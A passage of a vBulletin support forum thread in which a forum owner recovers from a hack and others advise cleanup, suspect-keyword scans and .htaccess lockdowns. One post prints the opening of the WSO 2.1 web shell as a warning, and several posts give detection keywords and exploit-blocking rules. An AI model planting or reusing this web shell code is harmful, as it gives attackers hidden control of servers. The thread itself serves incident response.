Hacked AGAIN- this time by W3 idiots! Help!

  • Allthumbz
    Senior Member
    • Oct 2011
    • 190

    #16
    Originally posted by donald1234
    If all your files were deleted from the server, and they were (I saw the index file earlier), indeed it looks like your whole forum inc database was gone. You or your host will need to do a complete restore from an earlier back up; that's why it will be taking so long. What type of hosting do you have, do you have a cpanel?
    All files in the public_html directory were deleted. The database remained (it is stored elsewhere) and it was backed up.
    Knownhost has taken over 7 hrs to restore. The other day it only took one hour. I asked and someone finally told me that "restores are not working on our system". I think their system was hacked and they are not admitting it.

    I have VPS hosting with cpanel and WM. I pay $65 per month for it. Their service has been excellent up to this round of hacking. Now- they suck. It looks like I will have to get a new host. They keep blaming it on VBulletin, saying it is a software problem and a password problem. But I changed all passwords and did everything software-wise that I was told to. I don't see how all files were deleted without knowing my FTP password or hacking the server. The FTP password was changed (as was the others). That leaves only one possibility.

    We've been down ALL DAY with this. And I need to get on once it comes up from restore and delete the INSTALL directory and check any other issues before they get me again.

    I am so tired.

    Nelson
    www.Hobby-Machinist.com


    • Allthumbz
      Senior Member
      • Oct 2011
      • 190

      #17
      Was just told by Knownhost- they CANNOT restore me to the 16th due to hacks (this is after 7 hours of waiting). Best they can do is the 13th. At this point, I am beside myself and don't know what to do. Does this sound possible that they cannot restore "due to hacks"?
      Nelson
      www.Hobby-Machinist.com


      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 74129

        #18
        The backups on the 16th could have been compromised as well. That is probably what they mean. I currently have a VPS with them and they are fairly good at providing the support they can.
        There are four steps to securing your site. If you don't do them all or you do them in the wrong order then you're still susceptible to being attacked again.

        Close the hole... This has three subparts in this instance.
        1. Delete your install folder
        2. Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
        3. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.
        Fill the Hole... There are seven subparts in this instance.
        1. Review your files for changes. You can do this under Maintenance -> Diagnostics.
        2. Delete any Suspect Files.
        3. Replace any files marked as "Does not contain expected contents"
        4. Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
        5. Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
        6. Update your Addon Products.
        7. Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.
        Secure the Hole
        Parts of this were done by closing the hole but there are still things to do here.
        1. Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
        2. Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
        3. Create a lower permission Administrator for everyday use.
        4. Review your permissions in the system.
        5. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
        6. Move your attachments outside the forum root directory.
        7. Create a complete backup of your site. Make database backups weekly.
        Vigilance
        You need to keep active on the security of the site.
        1. Give out the fewest permissions necessary for anyone to do their job
        2. Make sure your hosting provider updates the software.
        3. Update to the latest vBulletin when it is released.
        4. Make sure your addons are always up to date.


        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API


        • donald1234
          Senior Member
          • Oct 2011
          • 1953
          • 4.1.x

          #19
          You should have a good look at your server logs to see who got in and how so that you can tighten your security in that particular area.


          • Allthumbz
            Senior Member
            • Oct 2011
            • 190

            #20
            So I checked my "adminlog" in my SQL database for admin activity and determined, on the day this first started (9-12-13), the Indian hacker (Rishdal Rider) imported a new plugin.php file to my server.

            That adminlog in your database gives a lot of info. It tells WHAT they did, WHERE and what IP they used!
            282251 26675 1379042443 plugin.php files 113.193.161.110
            282252 26675 1379042458 plugin.php doimport 113.193.161.110
            282253 26675 1379042459 plugin.php 113.193.161.110
            Be sure to replace this file with the one from vBulletin if you are having trouble. The IP address lookup gives:
            113.193.161.110 (decimal 1908515182)
            Tikona Digital Networks Pvt. Ltd.
            None detected
            Broadband
            Static IP
            Geolocation Information: India, Gujarat, Ahmedabad
            23.0333 (23° 1′ 59.88″ N)
            72.6167 (72° 37′ 0.12″ E)
            Last edited by Allthumbz; Tue 17 Sep '13, 5:08pm.
            Nelson
            www.Hobby-Machinist.com
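As an added example (not code from any poster in this thread), here is a small POSIX shell script that does two of the checks recommended above: it walks a CSV export of the adminlog table in the column order shown in this post, converting the dateline to UTC and flagging rows from IPs outside a staff allowlist, and it greps recently changed PHP files for the keywords Wayne listed in #18. The CSV column order, the staff allowlist and the sample rows are assumptions constructed for the example.

```shell
#!/bin/sh
# Added triage helpers (not code from any poster in this thread).
#  flag_adminlog FILE ALLOWED_IP... : reads a comma-separated export of the
#      vBulletin adminlog table in the column order shown in post #20
#      (adminlogid,userid,dateline,script,action,ipaddress), converts the Unix
#      dateline to UTC and prints every row whose IP is not on the staff allowlist.
#  scan_php DIR DAYS : lists PHP files changed in the last DAYS days that contain
#      the function names Wayne listed (exec, system, passthru, base64, eval) or
#      an iframe tag, so they can be diffed against a clean vBulletin download.
set -eu

# Constructed sample: the three rows from post #20, as a CSV export would look.
SAMPLE_ADMINLOG='282251,26675,1379042443,plugin.php,files,113.193.161.110
282252,26675,1379042458,plugin.php,doimport,113.193.161.110
282253,26675,1379042459,plugin.php,,113.193.161.110'

# epoch_to_utc SECONDS: GNU date uses -d @N, BSD/macOS date uses -r N.
epoch_to_utc() {
    date -u -d "@$1" '+%Y-%m-%d %H:%M:%S' 2>/dev/null \
        || date -u -r "$1" '+%Y-%m-%d %H:%M:%S'
}

# flag_adminlog FILE ALLOWED_IP...: admin actions from an IP that no staff member
# uses are the clearest sign that an admin account or session was stolen.
flag_adminlog() {
    file="$1"; shift
    allowed=" $* "
    while IFS=, read -r _id userid dateline script action ip; do
        case "$allowed" in
            *" $ip "*) continue ;;   # expected staff address, skip
        esac
        printf '%s %s user=%s %s %s\n' \
            "$(epoch_to_utc "$dateline")" "$ip" "$userid" "$script" "$action"
    done < "$file"
}

# scan_php DIR DAYS: recently modified PHP files containing web-shell keywords.
# Matches are candidates for review, not proof: some legitimate addons use them.
scan_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" -exec grep -lEi \
        '(eval|system|exec|passthru|shell_exec)\(|base64_decode|<iframe' {} + \
        2>/dev/null | sort || true
}
```

Export the table from phpMyAdmin as CSV (no header row) and run `flag_adminlog adminlog.csv <your IP> <other staff IPs>`; any row printed was an admin action from an address you do not recognise.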


            • Allthumbz
              Senior Member
              • Oct 2011
              • 190

              #21
              Originally posted by Wayne Luke
              The backups on the 16th could have been compromised as well. That is probably what they mean. I currently have a VPS with them and they are fairly good at providing the support they can.
              There are four steps to securing your site. If you don't do them all or you do them in the wrong order then you're still susceptible to being attacked again.

              Close the hole... This has three subparts in this instance.
              1. Delete your install folder
              2. Review your admin users and delete any that don't belong. Don't ban them. Don't make them regular users. Delete them.
              3. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.
              Fill the Hole... There are seven subparts in this instance.
              1. Review your files for changes. You can do this under Maintenance -> Diagnostics.
              2. Delete any Suspect Files.
              3. Replace any files marked as "Does not contain expected contents"
              4. Scan your plugins for malicious code (exec, base64, system, pass_thru, iframe are all suspect keywords). Delete any you find.
              5. Repair any templates. Any templates that you don't have notes on changing, you need to revert. If you're using a custom style, it is best to delete your existing style and reimport from a fresh download.
              6. Update your Addon Products.
              7. Rebuild your datastores. You can use tools.php in the "do not upload" folder to do this. Upload it to your admincp directory, delete when done.
              Secure the Hole
              Parts of this were done by closing the hole but there are still things to do here.
              1. Keep notes of all changes you make to the system - what templates and phrases you change, what files belong to which addons, what plugins do the addons install.
              2. Consider using a separate Super Admin who has access to admin logs in the AdminCP. There should be only one Super Admin.
              3. Create a lower permission Administrator for every day use.
              4. Review your permissions in the system.
              5. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.
              6. Move your attachments outside the forum root directory.
              7. Create a complete backup of your site. Make database backups weekly.
              Vigilance
              You need to keep active on the security of the site.
              1. Give out the fewest permissions necessary for anyone to do their job
              2. Make sure your hosting provider updates the software.
              3. Update to the latest vBulletin when it is released.
              4. Make sure your addons are always up to date.

              Wayne,

              These are awesome suggestions. I have one newbie question about these two steps:
              1. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.
              2. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.

              I see there is an .htaccess file in the public_html (main forum directory). Can I edit that with Notepad? Exactly what commands do I use, and where, to close off the admincp and directories?

              Please forgive my ignorance here.

              Thanks.
              Nelson
              www.Hobby-Machinist.com


              • DemOnstar
                Senior Member
                • Nov 2012
                • 1912

                #22
                I am in the same position as you are. I know very little about .htaccess. Yes, it can be edited with Notepad... but I don't really understand what to do with it.
                As regards closing off adminCP, modCP and includes directories etc, in your hosts cPanel there should be an option to add passwords to directories. This is the way I did it...
                Last edited by DemOnstar; Tue 17 Sep '13, 7:47pm.



                • donald1234
                  Senior Member
                  • Oct 2011
                  • 1953
                  • 4.1.x

                  #23
                  You need to place a .htaccess file inside each of the above directories with a deny all order, the admin and mod cp will need an exception either by ip address or password so that you can enter. Remember that all of the above is useless if the attacker can access your server so make sure that is secure.


                  • Allthumbz
                    Senior Member
                    • Oct 2011
                    • 190

                    #24
                    In hope of helping someone else, here is another file the hacker uses. It looks innocent- 404.PHP. The bastard (Zishan Rider) even has the nerve to give himself CREDIT for it. If you see it, delete it immediately:

                    <?php
                    /* WSO 2.1 (Web Shell by Zishan Rider) */
                    $auth_pass = "78a1cdefcb87a7d3a9af3570416c2a93";
                    $color = "#00ff00";
                    $default_action = 'FilesMan';
                    @define('SELF_PATH', __FILE__);
                    if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
                    header('HTTP/1.0 404 Not Found');
                    exit;
                    }
                    @session_start();
                    @error_reporting(0);
                    @ini_set('error_log',NULL);
                    @ini_set('log_errors',0);
                    @ini_set('max_execution_time',0);
                    @set_time_limit(0);
                    @set_magic_quotes_runtime(0);
                    @define('VERSION', '2.1');
                    if( get_magic_quotes_gpc() ) {
                    function stripslashes_array($array) {
                    return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
                    }
                    $_POST = stripslashes_array($_POST);
                    }
                    function printLogin() {
                    ?>
                    <h1>Not Found</h1>
                    <p>The requested URL was not found on this server.</p>
                    <hr>
                    <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
                    <style>
                    input { margin:0;background-color:#fff;border:1px solid #fff; }
                    Nelson
                    www.Hobby-Machinist.com


                    • Allthumbz
                      Senior Member
                      • Oct 2011
                      • 190

                      #25
                      Originally posted by donald1234
                      You need to place a .htaccess file inside each of the above directories with a deny all order, the admin and mod cp will need an exception either by ip address or password so that you can enter. Remember that all of the above is useless if the attacker can access your server so make sure that is secure.

                      Can you give me the contents of the file to use please and tell me WHERE to put it so I can? Thanks!
                      Nelson
                      www.Hobby-Machinist.com


                      • donald1234
                        Senior Member
                        • Oct 2011
                        • 1953
                        • 4.1.x

                        #26
                        Hi, you put the .htaccess file inside the directories, so for includes it would be where your config.php is. To deny all it's:

                        order deny,allow
                        deny from all

                        and to make an exception for your admincp it's

                        order deny,allow
                        deny from all
                        # allow the admin (replace xx.xx.xx.xx with the real IP address)
                        allow from xx.xx.xx.xx
                        # allow moderator:
                        allow from xx.xx.xx.xx

                        Then only the person with the ip on the .ht can access your admincp. You need a fixed ip to do this.

                        You can also use a password if you don't have a fixed IP, but this is less secure as passwords can be hacked. I do not know the .htaccess contents for password protection as I have never used it, perhaps someone else has?
                        Last edited by donald1234; Wed 18 Sep '13, 8:47am.


                        • Ion Saliu
                          Senior Member
                          • Sep 2010
                          • 172
                          • 4.2.X

                          #27
                          From:


                          “To begin, decide which directory you would like to password protect (note that all files and subdirectories within the directory will be password protected), then create a .htaccess file following the main instructions and guidance which includes the following text:

                          AuthName "Member's Area Name"
                          AuthUserFile /path/to/password/file/.htpasswd
                          AuthType Basic
                          require valid-user

                          The first line tells the Apache Web Server the secure directory is called 'Member's Area Name', this will be displayed when the pop-up login prompt appears. The second line specifies the location of the password file. The third line specifies the authentication type, in this example we are using 'Basic' because we are using basic HTTP authentication and finally the fourth line specifies that we require valid login credentials, this line can also be used to specify a specific username, e.g. 'require user username' would require the username 'username'. You would use this if you were password protecting an administration area, rather than setting up a public password protected directory.”

                          .htaccess is actually a complicated matter, that’s why the vBulletin guys are so evasive about this Apache-only feature. There are many pundits who advise strongly against the usage of .htaccess. It does affect server performance and it is not as secure as people would expect. As I’ve said in several posts after this Psychosama hack, my website and forum have had plenty of .htaccess files in several directories. Still, my forum was hacked — but not the rest of my website!

                          Me thinks the problem is config.php in the /includes directory of the vB forum software. It must be made really secure — only the vBulletin Team can do that…


                          • Allthumbz
                            Senior Member
                            • Oct 2011
                            • 190

                            #28
                            I think Zishad nailed my .htaccess file. Can one of you fellow sufferers/good Samaritans post here an ENTIRE .htaccess as it is SUPPOSED to be along with the right commands to ban these worms? Thanks!

                            Nelson
                            www.Hobby-Machinist.com


                            • Ion Saliu
                              Senior Member
                              • Sep 2010
                              • 172
                              • 4.2.X

                              #29
                              Originally posted by Allthumbz
                              I think Zishad nailed my .htaccess file. Can one of you fellow sufferers/good Samaritans post here an ENTIRE .htaccess as it is SUPPOSED to be along with the right commands to ban these worms? Thanks!
                              Axiomatic Colleague of Mine:

                              As per my previous post, .htaccess is actually a complicated matter. The file can be very long and complex, covering a lot of server commands and controls. I can show a real file, but incomplete (to hide sensitive data). The fragment will work on your server, be it a website or a forum.

                              Copy-and-paste the code below to Notepad or any text editor (the best choice is Notepad++, a great freebie). Save the text file EXACTLY as .htaccess (make sure there is no .txt at the end). Upload .htaccess to the root of your site or forum via FTP; transfer mode: only ASCII or text mode. It should work – it bans many IPs for my site.

                              ## USER IP BANNING
                              <Limit GET POST>
                              order allow,deny
                              deny from 222.77.207.11
                              deny from 144.76.78.199
                              deny from 37.130.224.22
                              deny from 117.27.67.15
                              deny from 27.159.248.19
                              allow from all
                              </Limit>
                              <Limit PUT DELETE>
                              order deny,allow
                              deny from all
                              </Limit>

                              An easier way is to go to your AdminCP, Options, User Banning. Copy and paste the IPs you want to ban.

                              ---
                              Here is more .htaccess useful info, especially for the vBulletin Team to look at – block common exploit requests:



                              “Common Exploits
                              Block common exploit requests with 403 Forbidden. These can help a lot, may break some plugins.

                              RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
                              RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ ///.*\ HTTP/ [NC,OR]
                              RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\=?(http|ftp|ssl|https):/.*\ HTTP/ [NC,OR]
                              RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\?.*\ HTTP/ [NC,OR]
                              RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(asp|ini|dll).*\ HTTP/ [NC,OR]
                              RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(htpasswd|htaccess|aahtpasswd).*\ HTTP/ [NC]
                              RewriteRule .* - [F,NS,L]”

                              The author gives examples for his WordPress site (wp).


                              • Wayne Luke
                                vBulletin Technical Support Lead
                                • Aug 2000
                                • 74129

                                #30
                                Originally posted by Allthumbz

                                Wayne,

                                These are awesome suggestions. I have one newbie question about these two steps:
                                1. Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions.
                                2. Block off access to the includes, modcp, packages and vb folders via .htaccess. Deny All can work here, unless you use the ModCP. You need user authorization there.

                                I see there is an .htaccess file in the public_html (main forum directory). Can I edit that with Notepad? Exactly what commands do I use, and where, to close off the admincp and directories?

                                Please forgive my ignorance here.

                                Thanks.
                                Protecting files on your website from unauthorized users can be very important. Even more important is the method by which you accomplish this task. You could use PHP to listen for login authorization information on each page, but that doesn't protect your images, documents, and other media, does it? That's why I've found the .htaccess method of protecting files and directories the most reliable. Oh, and it's easy too!


                                If you have cPanel, you can do this in cPanel.



                                If those don't help, you need to contact your hosting company. Each directory needs its own .htaccess file. They don't need to be long... 4 lines in most cases.
                                Translations provided by Google.

                                Wayne Luke
                                The Rabid Badger - a vBulletin Cloud demonstration site.
                                vBulletin 5 API
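As an added example (not from Wayne or any other poster), here is a shell script that writes the per-directory .htaccess files described across #26 to #30: deny-all for includes, packages and vb, and an IP allowlist combined with Basic auth for admincp and modcp. It assumes placeholder paths (FORUM_ROOT, a .htpasswd kept outside public_html) and placeholder staff IPs, emits both Apache 2.4 (Require) and 2.2 (Order/Allow) syntax since the thread's snippets are 2.2 style, and ends with a check that every protected directory actually has its file.

```shell
#!/bin/sh
# Added example (not from any poster in this thread): write the per-directory
# .htaccess files the thread describes. Assumptions: FORUM_ROOT is the vBulletin
# root, ADMIN_IPS is a space-separated staff allowlist, HTPASSWD is an Apache
# htpasswd file stored OUTSIDE the web root (create it separately with
#   htpasswd -c /home/USER/.htpasswd adminuser ).
# Both Apache 2.4 (mod_authz_core) and 2.2 (Order/Deny/Allow) syntax are emitted.
set -eu

FORUM_ROOT="${FORUM_ROOT:-/home/USER/public_html}"   # placeholder path
ADMIN_IPS="${ADMIN_IPS:-203.0.113.10 203.0.113.11}"   # placeholder (RFC 5737) IPs
HTPASSWD="${HTPASSWD:-/home/USER/.htpasswd}"          # placeholder path

# deny_all DIR: nobody may request files in DIR over HTTP (includes, packages, vb).
# PHP's own include() is a filesystem read, so the forum keeps working.
deny_all() {
    dir="$1"
    mkdir -p "$dir"
    cat > "$dir/.htaccess" <<'EOF'
# Block all direct HTTP access to this directory.
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
EOF
}

# admin_only DIR IP...: allow only the listed IPs AND require an htpasswd login,
# so a leaked vBulletin admin password alone no longer reaches the AdminCP.
admin_only() {
    dir="$1"; shift
    ips="$*"
    mkdir -p "$dir"
    {
        echo 'AuthType Basic'
        echo 'AuthName "Staff area"'
        echo "AuthUserFile $HTPASSWD"
        echo '<IfModule mod_authz_core.c>'
        echo '    <RequireAll>'
        echo "        Require ip $ips"
        echo '        Require valid-user'
        echo '    </RequireAll>'
        echo '</IfModule>'
        echo '<IfModule !mod_authz_core.c>'
        echo '    Order deny,allow'
        echo '    Deny from all'
        for ip in $ips; do echo "    Allow from $ip"; done
        echo '    Require valid-user'
        echo '    Satisfy All'
        echo '</IfModule>'
    } > "$dir/.htaccess"
}

# audit_htaccess ROOT: return 1 if any protected directory lacks its .htaccess
# (worth re-running after every restore, since a restore can overwrite them).
audit_htaccess() {
    missing=0
    for d in admincp modcp includes packages vb; do
        [ -f "$1/$d/.htaccess" ] || { echo "missing: $1/$d/.htaccess"; missing=1; }
    done
    return $missing
}

protect_forum() {
    for d in includes packages vb; do deny_all "$FORUM_ROOT/$d"; done
    admin_only "$FORUM_ROOT/admincp" $ADMIN_IPS
    admin_only "$FORUM_ROOT/modcp" $ADMIN_IPS
    audit_htaccess "$FORUM_ROOT"
}
```

If you renamed your admincp or modcp directory in config.php, use those names in protect_forum and audit_htaccess; staff without a fixed IP should be given a VPN or static address rather than having the Require ip line removed.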

